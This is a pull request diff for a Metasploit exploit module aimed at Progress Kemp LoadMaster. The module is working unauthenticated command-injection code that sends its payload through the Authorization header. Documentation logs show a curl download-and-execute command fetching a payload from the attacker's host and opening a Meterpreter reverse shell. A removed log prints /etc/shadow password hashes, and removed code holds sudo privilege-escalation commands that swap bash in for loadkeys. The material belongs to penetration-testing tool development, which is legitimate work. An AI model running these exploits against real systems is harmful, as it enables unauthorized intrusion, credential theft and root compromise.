### PR TITLE
Remove Priv Esc to add it to another module and update it to only run…

### DIFF
--- a/documentation/modules/exploit/linux/http/progress_kemp_loadmaster_unauth_cmd_injection.md
+++ b/documentation/modules/exploit/linux/http/progress_kemp_loadmaster_unauth_cmd_injection.md
@@ -13,7 +13,6 @@ The AWS marketplace also has free trials which can be used. These require the "s
 https://aws.amazon.com/marketplace/pp/prodview-kgh3dsfk7qcnw
 
 ## Verification Steps
-With privesc:
 1. Install the application
 1. Start msfconsole
 1. Do: `use exploits/linux/http/progress_kemp_loadmaster_unauth_cmd_injection`
@@ -21,68 +20,78 @@ With privesc:
 1. Do: `set RPORT <port loadmaster is running on>`
 1. Do: `set LHOST <your host IP>`
 1. Do: `run`
-1. You should get a root shell.
-
-Without privesc:
-1. Install the application
-1. Start msfconsole
-1. Do: `use exploits/linux/http/progress_kemp_loadmaster_unauth_cmd_injection`
-1. Do: `set PRIVESC false`
-1. Do: `set RHOSTS <target loadmaster>`
-1. Do: `set RPORT <port loadmaster is running on>`
-1. Do: `set LHOST <your host IP>`
-1. Do: `run`
-1. You should get a shell as the "bal" user.
-
-## Options
-The only non-stanard option is PRIVESC.
-
-### PRIVESC
-
-This defaults to true. This enables or disables the use of an automatic privesc from the default "bal" user to root.
+1. You should get a shell as the `bal` user.
+1. (Optional) use the module `exploit/linux/local/progress_kemp_loadmaster_sudo_privesc_2024` to gain root privileges.
+1. (Optional) use the script `run_progress_kemp_loadmaster_sudo_priv_esc_2024.rc` to automatically run the above module.
 
 ## Scenarios
 
 ### LoadMaster 7.2.59.0.22007
 
-```
-msf6 > use exploit/linux/http/progress_kemp_loadmaster_unauth_cmd_injection
-[*] Using configured payload cmd/linux/https/x64/shell/reverse_tcp
-msf6 exploit(linux/http/progress_kemp_loadmaster_unauth_cmd_injection) > set RPORT 8443
-RPORT => 8443
-msf6 exploit(linux/http/progress_kemp_loadmaster_unauth_cmd_injection) > set RHOSTS 18.207.251.125
-RHOSTS => 18.207.251.125
-msf6 exploit(linux/http/progress_kemp_loadmaster_unauth_cmd_injection) > set LHOST ******
-LHOST => ******
-msf6 exploit(linux/http/progress_kemp_loadmaster_unauth_cmd_injection) > exploit
+``` msf
+msf6 exploit(linux/http/progress_kemp_loadmaster_unauth_cmd_injection) > show options
 
-[*] Started reverse TCP handler on *****:4444
+Module options (exploit/linux/http/progress_kemp_loadmaster_unauth_cmd_injection):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     10.5.134.141     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-met
+                                         asploit.html
+   RPORT      443              yes       The target port (TCP)
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       The URI path to LoadMaster
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      GyzwtIbxq        no        Name to use on remote system when storing payload; cannot contain spaces or slash
+                                                  es
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  /tmp/            yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST               10.5.135.201     yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/progress_kemp_loadmaster_unauth_cmd_injection) > run
+
+[*] Command to run on remote host: curl -so /tmp/LlipoMVy http://10.5.135.201:8080/RByzlSnTzclKDpvXskXIrg; chmod +x /tmp/LlipoMVy; /tmp/LlipoMVy &
+[*] Fetch handler listening on 10.5.135.201:8080
+[*] HTTP server started
+[*] Adding resource /RByzlSnTzclKDpvXskXIrg
+[*] Started reverse TCP handler on 10.5.135.201:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
-[*] Checking if 18.207.251.125:8443 is vulnerable...
+[*] Checking if 10.5.134.141:443 is vulnerable...
 [+] The target is vulnerable.
 [*] Sending payload...
-[*] Sending stage (38 bytes) to 18.207.251.125
-[*] Sending stage (38 bytes) to 18.207.251.125
-[*] Executing privilege escalation command...
-[-] Detected a session initiated too close to the first session. Terminating it.
-[*] 18.207.251.125 - Command shell session 2 closed.
-[*] Executing privilege escalation command...
-[*] Command shell session 2 opened (*****:4444 -> 18.207.251.125:12652) at 2024-03-18 18:34:50 +0000
+[*] Client 10.5.134.141 requested /RByzlSnTzclKDpvXskXIrg
+[*] Sending payload to 10.5.134.141 (curl/7.77.0)
+[+] Now background this session with "bg" and then run "resource run_progress_kemp_loadmaster_sudo_priv_esc_2024.rc" to get a root shell
+[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.134.141:29264) at 2024-04-12 17:08:57 -0500
 
-[-] Invalid session identifier: 2
-msf6 exploit(linux/http/progress_kemp_loadmaster_unauth_cmd_injection) > sessions -i 1
-[*] Starting interaction with 1...
-
-[*] Command shell session 1 opened (*****:4444 -> 18.207.251.125:12648) at 2024-03-18 18:35:10 +0000
-cat /.mnt/patch_name /etc/shadow
-7.2.59.0.22007.RELEASE
-root:*:11449:0:10000::::
-bin:*:8902:0:10000::::
-daemon:*:8902:0:10000::::
-nobody:*:0:0:10000::::
-sshd:*:0:0:10000::::
-bal:$6$9WGRyJ3L$2NojfaoGsP5y7xS/SzvDTfic4Q9VHcKUHWnFKv9GWraldWgKQUc/t8kNQFPh7axajQQLX1GU29K46yiwkd3v.0:11564:0:10000::::
-pwreset:vhQQ3AdHBais2:11564:0:10000::::
-hsync:*:11564:0:10000::::
-xroot:*:11449:1000:10000::::
+meterpreter > sysinfo
+Computer     : 10.5.134.141
+OS           : SuSE 7.2 (Linux 4.14.137)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: bal
 ```

--- a/modules/exploits/linux/http/progress_kemp_loadmaster_unauth_cmd_injection.rb
+++ b/modules/exploits/linux/http/progress_kemp_loadmaster_unauth_cmd_injection.rb
@@ -8,6 +8,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   prepend Msf::Exploit::Remote::AutoCheck
+  def flag_file
+    return @flag_file unless @flag_file.nil?
+
+    @flag_file = '/tmp/' + Rex::Text.rand_text_alpha(5)
+  end
 
   def initialize(info = {})
     super(
@@ -16,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Name' => 'Kemp LoadMaster Unauthenticated Command Injection',
         'Description' => %q{
           This module exploits an unauthenticated command injection vulnerability in
-          Progress Kemp LoadMaster in the authroization header.
+          Progress Kemp LoadMaster in the authorization header.
         },
         'Author' => [
           'Dave Yesland with Rhino Security Labs',
@@ -34,73 +39,64 @@ class MetasploitModule < Msf::Exploit::Remote
           'Reliability' => [ REPEATABLE_SESSION ]
         },
         'Platform' => ['unix', 'linux'],
-        'Arch' => [ARCH_X86, ARCH_X64],
-        'Targets' => [['Automatic', {}]],
+        'Arch' => [ARCH_CMD],
         'Privileged' => false,
+        'Targets' => [
+          [
+            'Automatic', # Add logic to run the payload only once
+            {
+              'Payload' => {
+                'Prepend' => "[ -f #{flag_file} ] || ( touch #{flag_file}; (sleep 60; rm #{flag_file})& ",
+                'Append' => ')',
+                'BadChars' => "\x3a\x27"
+              }
+            }
+          ],
+          [
+            'Do_Not_Prepend_Runonce_Code', # This will likely result in 2-3 sessions
+            {
+              'Payload' => {
+                'BadChars' => "\x3a\x27"
+              }
+            }
+          ]
+        ],
+        'Default_target' => 0,
         'DefaultOptions' => {
-          'PAYLOAD' => 'cmd/linux/https/x64/shell/reverse_tcp',
+          'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',
+          'FETCH_WRITABLE_DIR' => '/tmp/',
           'SSL' => true,
           'RPORT' => 443
-        },
-        'Payload' => {
-          'BadChars' => "\x3a\x27"
         }
       )
     )
 
     register_options([
-      OptString.new('TARGETURI', [true, 'The URI path to LoadMaster', '/']),
-      OptBool.new('PRIVESC', [true, 'Automatically try privesc to add sudo entry', true])
+      OptString.new('TARGETURI', [true, 'The URI path to LoadMaster', '/'])
     ])
-
-    @first_session_timestamp = nil
   end
 
   def exploit
     uri = normalize_uri(target_uri.path, 'access', 'set')
 
-    print_status('Sending payload...')
+    vprint_status('Sending payload...')
 
     send_request_cgi({
       'method' => 'GET',
       'uri' => uri,
       'vars_get' =>
-        {
-          'param' => 'enableapi',
-          'value' => '1'
-        },
-      'authorization' => basic_auth("';#{payload.encoded};echo '", 'anything'),
+                         {
+                           'param' => 'enableapi',
+                           'value' => '1'
+                         },
+      'authorization' => basic_auth("';#{payload.encoded};echo '", Rex::Text.rand_text_alpha(rand(8..15))),
       'verify' => false
     })
   end
 
-  def on_new_session(session)
-    # Kill the session if it was initiated too close to the first session
-    # This command injection tends to execute twice, so we want to kill
-    # the second session. Probably a better way to do this but I don't know it.
+  def on_new_session(client)
     super
-    current_time = Time.now.to_i
-    if @first_session_timestamp.nil?
-      @first_session_timestamp = current_time
-    elsif current_time - @first_session_timestamp < 5
-      print_error('Detected a session initiated too close to the first session. Terminating it.')
-      session.kill
-    end
-
-    # Run privesc commands if PRIVESC is set to true
-    if datastore['PRIVESC']
-      execute_privesc_command(session)
-    else
-      print_status('Privilege escalation skipped.')
-    end
-  end
-
-  def execute_privesc_command(session)
-    print_status('Executing privilege escalation command...')
-    session.shell_command('sudo /bin/cp /bin/loadkeys /tmp/loadkeys')
-    session.shell_command('sudo /bin/cp /bin/bash /bin/loadkeys')
-    session.shell_command('sudo /bin/loadkeys -c /bin/bash')
-    session.shell_command('cp /tmp/loadkeys /bin/loadkeys')
+    print_good('Now background this session with "bg" and then run "resource run_progress_kemp_loadmaster_sudo_priv_esc_2024.rc" to get a root shell')
   end
 
   def check
@@ -115,7 +111,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'param' => 'enableapi',
         'value' => '1'
       },
-      'authorization' => basic_auth("'", 'anything'),
+      'authorization' => basic_auth("'", Rex::Text.rand_text_alpha(rand(8..15))),
       'verify' => false
     })
 


### PR DESCRIPTION
This updates the module to only run once using the perpend and append payload options in the hash and pulls out the priv esc to go into another module I'll PR as soon as I'm done with this.

You can test it with the `automatic` target to see it only gets a single session, or `Do_Not_Prepend_Runonce_Code` target and see it gets multiple sessions occasionally.